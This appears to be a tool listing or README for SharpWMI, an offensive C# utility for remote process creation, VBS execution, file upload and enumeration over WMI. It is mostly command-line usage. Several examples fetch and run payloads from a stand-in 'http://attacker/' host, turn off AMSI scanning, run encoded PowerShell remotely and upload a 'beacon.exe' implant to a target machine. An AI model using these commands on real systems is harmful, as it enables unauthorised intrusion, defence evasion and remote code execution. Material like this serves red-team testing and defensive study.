Description
A C# implementation of various WMI functionality.
This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands.
| Platform | Windows |
| Author | Will Schroeder |
| License | 3-Clause BSD |
| URL | https://github.com/GhostPack/SharpWMI |
Usage
USAGE:
Local system enumeration:
SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
Remote system enumeration:
SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query="select * from win32_service" [namespace=BLAH]
Remote system logged-on users enumeration:
SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]
Remote process creation:
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="C:\\temp\\process.exe [args]" [amsi=disable] [result=true]
Remote VBS execution:
SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
File upload via WMI:
SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="C:\\source\\file.exe" dest="C:\\temp\\dest-file.exe" [amsi=disable]
Remote firewall enumeration:
SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
List processes:
SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]
Terminate process (first found):
SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]
Get environment variables (all if name not given):
SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]
Set environment variable:
SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]
Delete an environment variable:
SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]
Install MSI file:
SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="C:\\temp\\installer.msi" [amsi=disable]
NOTE:
- Any remote function also takes optional "username=DOMAIN\\user" and "password=Password123!" arguments.
- If computername is not specified, the tool targets localhost.
VBS Script execution:
The 'executevbs' action was reworked compared to the original version of SharpWMI.
The script specification defined in [script-specification] offers the following methods to point this tool at the target VBS code:
A) Execute an OS command via preset VBS code:
SharpWMI.exe action=executevbs [...] command="notepad.exe"
B) Download PowerShell commands from a URL and execute them from within VBS via PowerShell's StdIn:
SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"
C) Download a binary file from the given URL, store it at the specified path and then execute it:
url="SOURCE_URL,TARGET_PATH"
SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"
D) Download a binary file from the given URL, store it at the specified path and then execute an arbitrary command:
url="SOURCE_URL,TARGET_PATH"
SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"
E) Read a VBS script from a file and execute it:
SharpWMI.exe action=executevbs [...] script="myscript.vbs"
F) Execute a VBS script given literally on the command line:
SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"
G) Base64-decode the input string (an encoded VBS script) and execute it on the remote machine:
SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"
H) Read the contents of the given file, base64-decode them and then execute the result on the target machine:
SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"
Finally, the 'executevbs' action may take additional [time-specs], defined in seconds, which specify the script trigger and wait timeouts:
SharpWMI.exe action=executevbs [...] trigger=5 timeout=10
EXAMPLES:
SharpWMI.exe action=query query="select * from win32_process"
SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\\SecurityCenter2"
SharpWMI.exe action=loggedon computername=primary.testlab.local
SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
SharpWMI.exe action=exec computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
SharpWMI.exe action=exec computername=primary.testlab.local command="whoami" result=true amsi=disable
SharpWMI.exe action=executevbs computername=primary.testlab.local command="notepad.exe" eventname="MyLittleEvent" amsi=disable
SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\\harmj0y" password="Password123!"
SharpWMI.exe action=upload computername=primary.testlab.local source="beacon.exe" dest="C:\\Windows\\temp\\foo.exe" amsi=disable
SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer
SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local
SharpWMI.exe action=setenv name=FOO value="BAR" computername=primary.testlab.local
SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local
SharpWMI.exe action=install computername=primary.testlab.local path="C:\\temp\\installer.msi"